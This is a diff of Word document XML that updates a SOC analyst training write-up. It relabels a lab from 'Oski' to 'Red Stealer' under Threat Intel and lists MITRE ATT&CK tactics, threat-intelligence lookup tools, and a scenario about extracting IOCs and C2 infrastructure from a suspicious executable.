+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="1566376629">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="1693651851">
+    <w:abstractNumId w:val="27"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="368729510">
+    <w:abstractNumId w:val="22"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="995913821">
+    <w:abstractNumId w:val="36"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="1939436818">
+    <w:abstractNumId w:val="42"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="596404818">
     <w:abstractNumId w:val="17"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="215703269">
+  <w:num w:numId="11" w16cid:durableId="1285188812">
+    <w:abstractNumId w:val="30"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="1015108251">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="717777677">
+    <w:abstractNumId w:val="41"/>
+  </w:num>
+  <w:num w:numId="14" w16cid:durableId="1723746097">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="756097917">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="1441684063">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="1306930582">
+    <w:abstractNumId w:val="45"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="420181961">
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="19" w16cid:durableId="1485505354">
+    <w:abstractNumId w:val="29"/>
+  </w:num>
+  <w:num w:numId="20" w16cid:durableId="351497019">
+    <w:abstractNumId w:val="38"/>
+  </w:num>
+  <w:num w:numId="21" w16cid:durableId="931860164">
+    <w:abstractNumId w:val="31"/>
+  </w:num>
+  <w:num w:numId="22" w16cid:durableId="977879522">
+    <w:abstractNumId w:val="43"/>
+  </w:num>
+  <w:num w:numId="23" w16cid:durableId="2047176244">
+    <w:abstractNumId w:val="33"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="164366552">
+    <w:abstractNumId w:val="40"/>
+  </w:num>
+  <w:num w:numId="25" w16cid:durableId="1890456188">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="26" w16cid:durableId="452404641">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="27" w16cid:durableId="1997145567">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="1038580874">
-    <w:abstractNumId w:val="37"/>
-  </w:num>
-  <w:num w:numId="4" w16cid:durableId="79446798">
-    <w:abstractNumId w:val="10"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="1566376629">
+  <w:num w:numId="28" w16cid:durableId="1960642591">
     <w:abstractNumId w:val="15"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="1693651851">
-    <w:abstractNumId w:val="23"/>
+  <w:num w:numId="29" w16cid:durableId="707949224">
+    <w:abstractNumId w:val="16"/>
   </w:num>
-  <w:num w:numId="7" w16cid:durableId="368729510">
-    <w:abstractNumId w:val="19"/>
-  </w:num>
-  <w:num w:numId="8" w16cid:durableId="995913821">
-    <w:abstractNumId w:val="30"/>
-  </w:num>
-  <w:num w:numId="9" w16cid:durableId="1939436818">
-    <w:abstractNumId w:val="35"/>
-  </w:num>
-  <w:num w:numId="10" w16cid:durableId="596404818">
-    <w:abstractNumId w:val="14"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="1285188812">
-    <w:abstractNumId w:val="25"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="1015108251">
-    <w:abstractNumId w:val="20"/>
-  </w:num>
-  <w:num w:numId="13" w16cid:durableId="717777677">
-    <w:abstractNumId w:val="34"/>
-  </w:num>
-  <w:num w:numId="14" w16cid:durableId="1723746097">
-    <w:abstractNumId w:val="9"/>
-  </w:num>
-  <w:num w:numId="15" w16cid:durableId="756097917">
+  <w:num w:numId="30" w16cid:durableId="850677183">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="16" w16cid:durableId="1441684063">
-    <w:abstractNumId w:val="1"/>
+  <w:num w:numId="31" w16cid:durableId="1033263994">
+    <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="17" w16cid:durableId="1306930582">
-    <w:abstractNumId w:val="38"/>
-  </w:num>
-  <w:num w:numId="18" w16cid:durableId="420181961">
-    <w:abstractNumId w:val="16"/>
-  </w:num>
-  <w:num w:numId="19" w16cid:durableId="1485505354">
-    <w:abstractNumId w:val="24"/>
-  </w:num>
-  <w:num w:numId="20" w16cid:durableId="351497019">
-    <w:abstractNumId w:val="32"/>
-  </w:num>
-  <w:num w:numId="21" w16cid:durableId="931860164">
+  <w:num w:numId="32" w16cid:durableId="1546479019">
     <w:abstractNumId w:val="26"/>
   </w:num>
-  <w:num w:numId="22" w16cid:durableId="977879522">
-    <w:abstractNumId w:val="36"/>
-  </w:num>
-  <w:num w:numId="23" w16cid:durableId="2047176244">
-    <w:abstractNumId w:val="28"/>
-  </w:num>
-  <w:num w:numId="24" w16cid:durableId="164366552">
-    <w:abstractNumId w:val="33"/>
-  </w:num>
-  <w:num w:numId="25" w16cid:durableId="1890456188">
-    <w:abstractNumId w:val="11"/>
-  </w:num>
-  <w:num w:numId="26" w16cid:durableId="452404641">
-    <w:abstractNumId w:val="21"/>
-  </w:num>
-  <w:num w:numId="27" w16cid:durableId="1997145567">
+  <w:num w:numId="33" w16cid:durableId="275602559">
     <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="28" w16cid:durableId="1960642591">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
-  <w:num w:numId="29" w16cid:durableId="707949224">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
-  <w:num w:numId="30" w16cid:durableId="850677183">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="31" w16cid:durableId="1033263994">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="32" w16cid:durableId="1546479019">
-    <w:abstractNumId w:val="22"/>
-  </w:num>
-  <w:num w:numId="33" w16cid:durableId="275602559">
-    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="34" w16cid:durableId="1650328384">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="35" w16cid:durableId="638993257">
-    <w:abstractNumId w:val="29"/>
+    <w:abstractNumId w:val="34"/>
   </w:num>
   <w:num w:numId="36" w16cid:durableId="598416422">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="32"/>
   </w:num>
   <w:num w:numId="37" w16cid:durableId="211692569">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="38" w16cid:durableId="1285767287">
-    <w:abstractNumId w:val="31"/>
+    <w:abstractNumId w:val="37"/>
   </w:num>
   <w:num w:numId="39" w16cid:durableId="787890575">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="40" w16cid:durableId="1196315122">
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="41" w16cid:durableId="1423988020">
+    <w:abstractNumId w:val="39"/>
+  </w:num>
+  <w:num w:numId="42" w16cid:durableId="1949000556">
+    <w:abstractNumId w:val="35"/>
+  </w:num>
+  <w:num w:numId="43" w16cid:durableId="291986773">
+    <w:abstractNumId w:val="28"/>
+  </w:num>
+  <w:num w:numId="44" w16cid:durableId="1548487508">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="45" w16cid:durableId="912616598">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="46" w16cid:durableId="1449012507">
+    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>

--- a/SOC analyst lv 1/TEMP.docx
+++ b/SOC analyst lv 1/TEMP.docx
@@ -12,8 +12,9 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -21,6 +22,16 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>Challenge</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -39,7 +50,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Oski</w:t>
+        <w:t>Red</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Stealer</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -189,25 +218,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Endpoint</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Forensics</w:t>
+        <w:t>Threat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Intel</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -256,25 +285,177 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Initial</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Access, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t>Execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ersistence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Privilege</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Escalation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Stealth</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Defense</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Impairment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Discovery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Collection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Impact</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -323,7 +504,69 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:t>Whois</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>VirusTotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Mal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>wareBazaar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ThreatFox</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -363,17 +606,18 @@
         </w:rPr>
         <w:t>VIEWS LAB:</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
         <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
@@ -393,20 +637,18 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t xml:space="preserve">Kịch bản: </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -434,25 +676,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>sandbox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>report</w:t>
+        <w:t>suspicious</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>executable</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -488,7 +730,43 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Any.Run</w:t>
+        <w:t>VirusTotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>MalwareBazaar</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -506,6 +784,42 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:t>extract</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>IOCs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>identify</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -515,52 +829,34 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Stealc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>behavior</w:t>
+        <w:t xml:space="preserve"> C2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>infrastructure</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, MITRE ATT&amp;CK </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
